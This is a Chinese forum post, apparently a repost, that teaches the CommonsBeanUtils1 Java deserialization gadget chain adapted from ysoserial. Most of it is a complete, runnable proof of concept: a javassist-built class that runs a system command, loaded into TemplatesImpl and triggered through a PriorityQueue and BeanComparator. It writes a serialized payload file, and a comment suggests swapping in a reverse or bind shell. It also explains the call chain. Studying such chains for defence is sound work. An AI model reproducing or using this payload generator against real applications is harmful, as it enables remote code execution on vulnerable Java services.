ToB企服应用市场:ToB评测及商务社交产业平台

标题: CommonsBeanUtils1（基于ysoserial） [打印本页]

---

作者: 慢吞云雾缓吐愁    时间: 2024-11-20 13:51
标题: CommonsBeanUtils1（基于ysoserial）
环境预备

JDK1.8(8u421) JDK8的版本应该都没什么影响，这里直接以我的镜像为准了、commons-beanutils:commons-beanutils:1.9.2、commons-collections:commons-collections:3.2、javassist:javassist:3.12.0.GA
mvn中加入以下依赖：

1. <dependency>
2.     <groupId>commons-collections</groupId>
3.     <artifactId>commons-collections</artifactId>
4.     <version>3.2</version>
5. </dependency>
6. <dependency>
7.     <groupId>javassist</groupId>
8.     <artifactId>javassist</artifactId>
9.     <version>3.12.1.GA</version>
10. </dependency>
12. <dependency>
13.     <groupId>commons-beanutils</groupId>
14.     <artifactId>commons-beanutils</artifactId>
15.     <version>1.9.1</version>
16. </dependency>

复制代码

正文

CB链用到了CC2中的TemplatesImpl的内容，如果你对CC2链不太认识，可以先看一下这个：https://www.cnblogs.com/erosion2020/p/18553815
当你知道CC2中的攻击链的构成之后，你学CB链就会非常轻松，CB链也可以说是CC2链的一个变种，只是反序列化的点换成了commons-beanutils中的另一个类，也就是BeanComparator，下边来表明一下这个类是怎么触发TemplatesImpl的。
BeanComparator

BeanComparator 是 Java 中常见的一个类，通常用于在聚集中对 Java Bean 对象举行比较排序。它实现了 Comparator 接口，目的是根据对象的某个或多个属性举行排序。在一些框架中（如 Apache Commons BeanUtils 或雷同的工具库），BeanComparator 是一种常见的比较器实现，简化了比较操作，尤其是当比较的对象是 Java Bean 时。
基本作用

• 通过指定的属性举行排序：它根据给定的 Java Bean 的某个属性值举行排序。比如，如果有一个 Person 类，它有 name 和 age 属性，可以使用 BeanComparator 来根据 name 或 age 举行升序或降序排序。
  
• 灵活性：BeanComparator 可以指定一个或多个属性举行排序，支持更复杂的排序逻辑。通过利用 Java 反射，BeanComparator 可以或许获取 Bean 的属性值并举行比较。
  

可以指定一个或多个属性举行排序，支持更复杂的排序逻辑这一句话是非常重要的，正是因为BeanComparator可以通过字段属性排序，所以导致了攻击链的触发。
代码分析

1. public class BeanComparator<T> implements Comparator<T>, Serializable {
2.     // 属性字段
3.     private String property;
4.     // 内部封装了一个Comparator比较器
5.     private final Comparator<?> comparator;
6.         // 调用compare比较两个对象的值
7.     public int compare(T o1, T o2) {
8.             ......
9.             // PropertyUtils.getProperty是重点方法
10.         Object value1 = PropertyUtils.getProperty(o1, this.property);
11.         Object value2 = PropertyUtils.getProperty(o2, this.property);
12.         return this.internalCompare(value1, value2);
13.         .......
14.     }
15. }
17. PropertyUtils.getProperty(Object bean, String name) {
18.     // 关注这个getProperty方法
19.     return PropertyUtilsBean.getInstance().getProperty(bean, name);
20. }
21. // 会执行到这个方法
22. public Object getProperty(Object bean, String name) {
23.     return this.getNestedProperty(bean, name);
24. }
25. public Object getNestedProperty(Object bean, String name) {
26.     ......
27.     if (bean instanceof Map) {
28.         bean = this.getPropertyOfMapBean((Map)bean, name);
29.     } else if (this.resolver.isMapped(name)) {
30.         bean = this.getMappedProperty(bean, name);
31.     } else if (this.resolver.isIndexed(name)) {
32.         bean = this.getIndexedProperty(bean, name);
33.     } else {
34.         // 重点关注这个方法，如果bean是我们构造的TemplatesImpl对象，则会触发这个方法
35.         bean = this.getSimpleProperty(bean, name);
36.     }
37.         ......
38.     return bean;
39. }
40. // 这是最终触发调用链代码的方法
41. public Object getSimpleProperty(Object bean, String name) {
42.     // getPropertyDescriptor可以理解为获取bean这个对象中的所有属性字段，如果这个字段存在getter方法，也会获取到
43.     // 假设bean中存在info字段以及getInfo方法，则PropertyDescriptor中的字段信息如下：
44.     // name字段为info
45.     // readMethodName字段为getOutputProperties
46.     PropertyDescriptor descriptor = this.getPropertyDescriptor(bean, name);
47.     if (descriptor == null) {
48.         throw new NoSuchMethodException("Unknown property '" + name + "' on class '" + bean.getClass() + "'");
49.     } else {
50.         // 在这里获取到了readMethodName所对应的Method对象
51.         Method readMethod = this.getReadMethod(bean.getClass(), descriptor);
52.         if (readMethod == null) {
53.             throw new NoSuchMethodException("Property '" + name + "' has no getter method in class '" + bean.getClass() + "'");
54.         } else {
55.             // 执行Method
56.             // 如果这里的Method是我们精心构造的TemplatesImpl的getOutputProperties，那么我们的攻击链代码就可以被触发
57.             Object value = this.invokeMethod(readMethod, bean, EMPTY_OBJECT_ARRAY);
58.             return value;
59.         }
60.     }
61. }

复制代码

所以理清上边的思路之后，我们现在要做的事情就是构造一个TemplatesImpl对象，然后创建一个BeanComparator，把其中的property设置为TemplatesImpl的outputProperties字段，然后在触发了BeanComparator的compare方法时，如果中的T类型为TemplatesImpl，则终极会触发TemplatesImpl的getOutputProperties方法，然后触发我们的调用链
POC(基于ysoserial)

老例子，这个还是ysoserial的代码拿过来改了，没有调用ysoserial中的工具类，不依赖工具库可以直接当地调试运行。

1. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
3. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
4. import javassist.ClassPool;
5. import javassist.CtClass;
6. import org.apache.commons.beanutils.BeanComparator;
8. import java.io.FileInputStream;
9. import java.io.FileOutputStream;
10. import java.io.ObjectInputStream;
11. import java.io.ObjectOutputStream;
12. import java.lang.reflect.Field;
13. import java.math.BigInteger;
14. import java.util.PriorityQueue;
16. public class CommonsBeanUtils1 {
17.     static String serialFileName = "commons-bean-utils1.ser";
18.     public static void main(String[] args) throws Exception {
19. //        cb1bySerial();
20.         verify();
21.     }
23.     public static void verify() throws Exception {
24.         // 本地模拟反序列化
25.         FileInputStream fis = new FileInputStream(serialFileName);
26.         ObjectInputStream ois = new ObjectInputStream(fis);
27.         Object ignore = (Object) ois.readObject();
28.     }
30.     public static void cb1bySerial() throws Exception {
31.         //==========================CC2中的构造Templates的内容 START==========================
32.         String executeCode = "Runtime.getRuntime().exec("cmd /c start");";
33.         ClassPool pool = ClassPool.getDefault();
34.         CtClass evil = pool.makeClass("ysoserial.Evil");
35.         // run command in static initializer
36.         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
37.         evil.makeClassInitializer().insertAfter(executeCode);
38.         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
39.         evil.setName("ysoserial.Pwner" + System.nanoTime());
40.         CtClass superC = pool.get(AbstractTranslet.class.getName());
41.         evil.setSuperclass(superC);
43.         final byte[] classBytes = evil.toBytecode();
44.         byte[][] trueclassbyte = new byte[][]{classBytes};
46.         Class<TemplatesImpl> templatesClass = TemplatesImpl.class;
47.         TemplatesImpl templates = TemplatesImpl.class.newInstance();
48.         Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
49.         bytecodes.setAccessible(true);
50.         bytecodes.set(templates, trueclassbyte);
52.         Field name = templatesClass.getDeclaredField("_name");
53.         name.setAccessible(true);
54.         name.set(templates, "Pwnr");
56.         Field tfactory = templatesClass.getDeclaredField("_tfactory");
57.         tfactory.setAccessible(true);
58.         tfactory.set(templates, new TransformerFactoryImpl());
59.         //==========================CB1链触发点 START==========================
61.         // mock method name until armed
62.         final BeanComparator comparator = new BeanComparator("lowestSetBit");
64.         // create queue with numbers and basic comparator
65.         final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
66.         // stub data for replacement later
67.         // 这里是让其触发BigInteger.lowestSetBit属性方法，可以在set queue值的时候不报错。
68.         queue.add(new BigInteger("1"));
69.         queue.add(new BigInteger("1"));
71.         // switch method called by comparator
72.         // 然后通过反射来对应的属性值，这样就能避免触发额外的动作
73.         Field property = comparator.getClass().getDeclaredField("property");
74.         property.setAccessible(true);
75.         property.set(comparator, "outputProperties");
77.         // switch contents of queue
78.         // queue中的值也是一样，通过反射来set值就不会触发heapfiy等一系列动作
79.         Field queueFiled = queue.getClass().getDeclaredField("queue");
80.         queueFiled.setAccessible(true);
81.         final Object[] queueArray = (Object[])queueFiled.get(queue);
82.         queueArray[0] = templates;
83.         queueArray[1] = templates;
85.         //====================CB1链触发END===================
86.         FileOutputStream fos = new FileOutputStream(serialFileName);
87.         ObjectOutputStream oos = new ObjectOutputStream(fos);
88.         oos.writeObject(queue);
89.         oos.flush();
90.         oos.close();
91.         fos.close();
92.     }
93. }

复制代码

运行

尝试运行代码，来弹个cmd

调用链

调用链如下

• PriorityQueue.readObject()
  
  
  
  • PriorityQueue.heapify()
    
    
    
    • PriorityQueue.siftDown()
      
      
      
      • PriorityQueue.siftDownUsingComparator()
        
        
        
        • BeanComparator.compare()
          
        • PropertyUtils.getProperty()
          
        • PropertyUtilsBean.getProperty()
          
        • PropertyUtilsBean.getNestedProperty()
          
        • PropertyUtilsBean.getSimpleProperty()
          
        • PropertyUtilsBean.getPropertyDescriptor()
          
        • PropertyUtilsBean.getReadMethod()
          
        • PropertyUtilsBean.invokeMethod()
          
          
          
          • TemplatesImpl.getOutputProperties()
            
          • TemplatesImpl.newTransformer()
            
          • TemplatesImpl.getTransletInstance()
            
            
            
            • TemplatesImpl.defineTransletClasses()
              
            
            
          • (AbstractTranslet) _class[_transletIndex].getConstructor().newInstance()
            
          
          
        
        
      
      
    
    
  
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4